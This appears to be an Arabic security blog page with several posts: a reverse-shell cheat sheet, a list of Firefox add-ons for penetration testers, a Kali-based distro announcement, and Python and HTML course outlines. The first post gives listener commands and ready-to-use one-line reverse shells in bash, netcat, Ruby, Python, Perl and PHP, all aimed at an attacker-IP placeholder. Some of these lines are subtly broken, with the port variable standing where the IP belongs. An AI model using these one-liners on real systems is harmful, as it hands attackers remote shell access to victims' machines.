انشاء اتصال عكسي من سطر واحد وبعدة لغات

17:11 | نشره : | نشر في: | 0تعليقات

هذه معاني المتغيرات التي ستجدها في الشرح. استبدلها عند التطبيق.
$ATTCKER_IP: هو عنواد المهاجم
$ATTACKER_PORT: هو المنفذ الذي ينصت عليه الضحية
$VICTIM_IP: هو عنواد المهاجم
$VICTIM_PORT: هو المنفذ الذي ينصت عليه الضحية

Listining

تستطيع الإنصات بأي طريقة تحبها
- NetCat
nc -lvp $ATTACKER_PORT
أو
ncat -lvp $ATTACKER_PORT
- Metasploit
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=$ATTCKER_IP LPORT=$ATTACKER_PORT E
PAYLOAD => windows/shell/reverse_tcp
LHOST => $ATTCKER_IP
LPORT => $ATTCKER_PORT
[*] Started reverse handler on $ATTCKER_IP:$ATTCKER_PORT
[*] Starting the payload handler...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to $VICTIM_IP
[*] Command shell session 1 opened ($ATTCKER_IP:$ATTCKER_PORT -> $VICTIM_IP:47657) at 2013-03-15 06:51:17 -0500

Reverse connection

طبعا كل ما سيطبق هنا هو على جهاز الضحية.
إذا كان جهاز الضحية ويندوز سنستبدل “/bin/bash” أو “/bin/sh” بـ cmd.exe

Bash
bash -i >& /dev/tcp/$ATTCKER_IP/$ATTCKER_PORT 0>&1

NetCat
nc -nvv $ATTCKER_IP $ATTCKER_PORT -e /bin/bash
أو
nc -c /bin/sh $ATTCKER_IP $ATTCKER_PORT

Ruby
ruby -r socket -e ' f=TCPSocket.open("$ATTCKER_IP",$ATTCKER_PORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ATTCKER_PORT",$ATTCKER_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Perl
perl -e 'use Socket;$i="$ATTCKER_PORT";$p=$ATTCKER_PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))) {open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

Php
php -r '$sock=fsockopen("$ATTACKER_IP",$ATTACKER_PORT);exec("/bin/sh -i <&3 >&3 2>&3");'

تابع القراءة Résuméabuiyad

إضافات Firefox مميزة لمختبري الإختراق

17:03 | نشره : | نشر في: | 0تعليقات

 

Mozilla-Firefox-add-ons1
متصفح Firefox هو واحد من أشهر متصفحات الإنترنت و يتم الإعتماد عليه من قبل الكثير من المستخدمين حول العالم و اهم ما يميز متصفح فايرفوكس انه يدعم نظام الإضافات ( Addons ) حيث يتوفر له الآلاف من الأضافات المجانية التي تساعد و تعزز من اداء المتصفح و إمكانياته بشكل كبير ,كما ان المتصفح يستخدمه الكثير من مختبري الإختراق أو الـ Penetration Testers و من المعروف ان مختبر الإختراق دائما ما يحتاج إلى ادوات تساعدة في اداء عمله
في هذة المقالة سوف نحاول ان نستعرض اهم إضافات Firefox التي تفيد مختبري الإختراق و التي تسهل و وتوفر الكثير من الوقت و المجهود و التي لا استطيع انا شخصياً الإستنغاء عنها :)
sqlinjectme SQL Inject ME
اضافة مفيدة تساعد على إختبار و الكشف عن ثغرات Sql Injection في التطبيقات عن طريق إختبار جميع المدخلات بالصفحة (Forms) و التحقق في حاله حدوث خطاء يدل على وجود ثغرة من نوع Sql Injection
Live HTTP Headerslivehttpheaders
إضافة جميلة جداً تساعد على إلتقاط جميع الـ Http Headers عند زياره صفحة كالـ Sniffer مع امكانية إعادة إرسال الطلب مرة اخرى و التعديل على الـ Headers المرسلة مثل Referer ,Cookies او POST Data و غيرهم
Wappalyzerwapplayzer
إضافة قوية للغاية و في رأي إضافة لا يمكن الأستغناء عنها ابداً فهي اضافة تساعد على عمل Fingerprinting للكثير من الاشياء كنوع و إصدار خادم الويب و نظام التشغيل الخاص بالسيرفر و التقنيات المستخدمة في انشاء و برمجة الموقع مع امكانية التعرف بشكل تلاقئ و سريع على تطبيق الويب المستخدم مثل WordPress , Joomla , Opencart , Roundcube و غيرهم الكثير .
XSS-Mesqlinjectme
اضافة مشابة لنفس فكرة اضافة Sql Inject Me لكن هذة الأضافة تقوم بإختبار تطبيق الويب للثغرات من نوع Cross Site Scripting او XSS من خلال تجربة الكثير من Xss Payloads و التحقق في حاله وجود ثغرة .
User Agent Switcheruseragent
اضافة سهله و مفيدة تقوم بتغير نوع المتصفح او الـ Useragent و التي قد تكون مفيدة احياناً عند عند الحاجة لإختبار تطبيق الويب الذي يعمل على اجهزة الموبايل و ليس على المتصفحات العادية فمن الممكن عن طريق هذة الأضافة تزيف نوع المتصفح عندما يحاول التعرف عليه الخادم .
Firesheep firesheep
إضافة شهيرة و معروفة لدى الكثير الأن و هي تعمل بالظبط كـ Packet Sniffer للتجسس على الشبكات و التقاط معلومات Cookies المرسلة من خلال الأجهزة المتصلة على الشبكة و التى تفيد بعد ذلك مختبر الإختراق في الحصول على معلومات المستخدمين
FlagFoxflagfox
إضافة جميلة و مفيدة تعمل مباشرة عند زيارة صفحة الموقع و تساعد بالحصول على معلومات مثلا IP address الخاص بالخادم و اسم و علم الدولة الموجود فيها الخادم عن طريق الـ GEOIP
Tamper Data tamperdata
إضافة مشابة لإضافة الـ Live Http Headers و قد تكون أسهل من ناحية الإستخدام حيث تساعد على التقاط الـ http requests المرسلة للخادم مع امكانية التعديل عليها بنفس الحظة
Leet Keytamperdata
إضافة مفيدة تساعد مختبر الإختراق على التشفير و فك التشفير لكثير من انواع التشفير مثل BASE64 , URL BIN , ENCODE , HEX و كل ذلك بإستخدام إختصارات للكيبورد مباشرة من المتصفح و بطريقة سهله للغاية
Elite Proxy Switcherelite
إضافة بسيطة تساعد على تفعيل و تعديل اعدادات الـبروكسي او تعطيلها بضغطة ماوس مباشر بشكل سريع دون الحاجة لعملها من اعدادات المتصفح التقليدية .
HackBarhackbar
إضافة بسيطة ومبرمجة خصيصاً لمختبري الإختراق حتى تساعد على إختبار ثغرات Sql Injections و Xss و المساعدة على كتابة الإستعلامات الخاصة بحقن قواعد البينات بشكل سريع مثلا Union Select و استخدام انواع التشفير المختلفة مثل MySQL CHAR و MD5 و غيرها .
و إلى هنا قد نكون ذكرنا و استعرضنا أهم إضافات المتصفح المفيدة لمختبري الإختراق و التي تعمل بشكل تلاقئ و سريع دون الحاجة لإستخدام ادوات منفصلة لعمل ذلك , و لكن بالطبع قد لا تكون هذة هي كل الإضافات الموجودة و المتوفرة لمختبري الإختراق فلذلك اذا كان لديك اقتراح على إضافات أخرى مفيدة ارجو إعلامي بذلك حتى يتم إضافاتها للقائمة :)
تابع القراءة Résuméabuiyad

C.I.A V3 Wheezy 7.1 Kali-Linux

13:12 | نشره : | نشر في: | 1 تعليق

اليوم اقدم لكم توزيعة جديدة إسمها

C.I.A V3 Wheezy 7.1 Kali-Linux

هي نفسها توزيعة الكالي لينكس لكن مضاف اليها بعض التحسينات و التعديلات في الثيم و بعض خصائص الكرافيكس، و تمت اضافة بعض الادوات الجديدة ايضا الخاصة باختبار الاختراق اترككم لتكتشفوها بانفسكم .للتحميل من الموع الرسمي

 هنا


2


1







تابع القراءة Résuméabuiyad

Learning Python Programming

10:46 | نشره : | نشر في: | 0تعليقات

In this Python training course from expert programmer and author , you will learn how to program with the popular development language. This tutorial is designed for the beginner, and you do not need to have any experience at all with programming or development in order to learn how to program with Python using this video tutorial.

Some of the topics that Mike covers throughout the training include installing Python, data types and creating variables, input and output, decision making and repetition, iterators, list comprehension and functions. He also covers variable scope, modules - creating and using pre-built ones, object oriented programming, inheritance, exception handling and using data structures.

By the completion of this video based training course on Python programming, you will be comfortable with Python and how to apply it to developing applications. Throughout the course you will apply what you learn in real-world examples, reinforcing what Mike is teaching you. Working files are included to allow you to use the same source material that the author does in this training course.

01. Introduction


    1 What This Course Covers

02. Installing Python


    1 Installing Python In Windows

    2 Installing Python On A Mac

03. Writing Your First Program - Hello, World!


    1 Entering And Running A Program In Windows

    2 Entering And Running A Program On A Mac

    3 Exercise 1

04. Python Basic Data Types And Variables


    1 Expressions, Statements, Variables

    2 Working With Numbers

    3 Working With Strings

    4 Working With Booleans

    5 Working With Lists

    6 Working With Dictionaries

    7 Working With Tuples

    8 Exercise 1

    9 Exercise 2

05. Python Input/Output


    1 Using The Print Function - Part 1

    2 Using The Print Function - Part 2

    3 Getting Input From The User

    4 Exercise 1

06. Making Decisions - if Statements


    1 The Relational Operators

    2 The Logical Operators

    3 Simple if Statement

    4 if-else Statement

    5 if-elif Statement

    6 Exercise 1

    7 Exercise 2

07. while Loops


    1 Introduction To while Loops
    2 Count-Controlled while Loops
    3 Event-Controlled while Loops
    4 Using continue
    5 Using break
    6 Working With Files - Part 1
    7 Working With Files - Part 2
    8 Exercise 1
    9 Exercise 2

08. for Loops


    1 Introduction To for Loops - Part 1
    2 Introduction To for Loops - Part 2
    3 for Loops With Lists
    4 for Loops With Tuples
    5 for Loops With Dictionaries
    6 for Loops With Files
    7 Exercise 1
    8 Exercise 2

09. Iterators


    1 Understanding Iterators
    2 Using iter And next
    3 Iterators And Dictionaries
    4 Other Iterators
    5 Exercise 1

10. List Comprehensions


    1 Introduction To List Comprehensions
    2 Using List Comprehensions With Files
    3 Exercise 1

11. Functions


    1 Introduction To Functions - Why
    2 Defining Functions
    3 Calling Functions
    4 Functions With Multiple Arguments
    5 Predicate Functions
    6 Exercise 1
    7 Exercise 2

12. More On Functions


    1 Recursive Functions - Part 1
    2 Recursive Functions - Part 2
    3 Function Objects
    4 Anonymous Functions
    5 Higher-Order Functions
    6 Exercise 1
    7 Exercise 2

13. Scope


    1 Global Scope
    2 Local Scope
    3 Nested Scope
    4 Exercise 1 - Part 1
    5 Exercise 1 - Part 2

14. Modules


    1 Using Built-In Modules
    2 User-Defined Modules - Part 1
    3 User-Defined Modules - Part 2
    4 Module Namespaces
    5 Exercise 1

15. Object-Oriented Programming - Part 1


    1 Abstract Data Types
    2 Designing A Class, Fields And Constructors
    3 Designing A Class, Methods
    4 Data Structure For Fields
    5 Exercise 1
    6 Exercise 2

16. Object-Oriented Programming - Part 2


    1 Creating A Derived Class - Part 1
    2 Creating A Derived Class - Part 2
    3 Exercise 1
    4 Exercise 2

17. Exception Handling


    1 Exceptions Demonstrated
    2 Try-Except Statements
    3 Try-Except-Finally Statements
    4 The raise Statement
    5 Exercise 1

18. Using Data Structures


    1 Exercise 1 - Lists
    2 Exercise 2 - Tuples
    3 Exercise 3 - Dictionaries

تابع القراءة Résuméabuiyad

التعليم التفاعلي HTML

14:56 | نشره : | نشر في: | 0تعليقات
التعليم التفاعلي HTML



فهرس الدورة

أساسيات HTML التعرف على الإطارات
مقدمة عن HTML مقدمة عن الإطارات
كيف نبدأ أساسيات الإطارات
بيئة صفحة HTML الخاصية COLS
التعرف على HTML Tags الخاصية ROWS
تلوين الصفحة الوسم Frame
تنسيق النصوص أمثلة عن الإطارات
تنسيق الخطوط تطبيق عملي للجداول والإطارات
تنسيق العناوين الفرعية مثال عن الجداول والإطارات
تنسيقات أخرى المسطرة الأفقية
مثال على تنسيقات الخطوط التعرف على النماذج
تنسيق الفقرات مقدمة عن النماذج
استخدام النص المسبق التنسيق أساسيات النماذج
تنسيق القوائم التعرف على TextArea
أمثلة على تنسيق القوائم التعرف على Select
التعامل مع الصور والرسومات التعرف على عنصر Input
مقدمة عن الصور والرسومات التعرف على Textbox
إضافة صورة إلى صفحة الويب التعرف على Password
تحديد عنوان الصورة التعرف على Checkbox
تنسيق محاذاة النص للصورة التعرف على Radio
تحديد موقع الصورة بالنسبة لصفحة الويب التعرف على Reset
تحديد حجم الصورة التعرف على Submet
تحديد النص البديل تنسيق النماذج
تحديد إطار للصورة مقدمة عن تنسيق النماذج
ملاحظات عن الصور الرسوم التنسيق باستخدام الخط الفاصل
الوصلات التشعبية التعامل مع الحقول كبيرة الحجم
مقدمة عن الوصلات التشعبية التنسيق باستخدام الوسم PRE
الوصلات النصية التنسيق باستخدام الجداول
الوصلات الرسومية التعرف على PlugIns
الوصلات إلى موقع خارجي مقدمة عن PlugIns
الوصلات النسبية التعرف على Embed
الوصلات الداخلية التعرف على Object
الوصلات البريدية الوسوم META
وصلات أخرى دعم اللغة العربية
التعرف على الجداول ترويج موقعك على الإنترنت
أساسيات الجدول خصائص الوسم Meta
خصائص واسمات الجدول الخرائط الصورية
أمثلة عن خصائص واسمات الجدول مقدمة عن الخرائط الصورية
خصائص واسمات الصف وسوم الخرائط الصورية
خصائص واسمات الخلية مثال على الخرائط الصورية


تابع القراءة Résuméabuiyad

جميع الحقوق محفوظة ©2013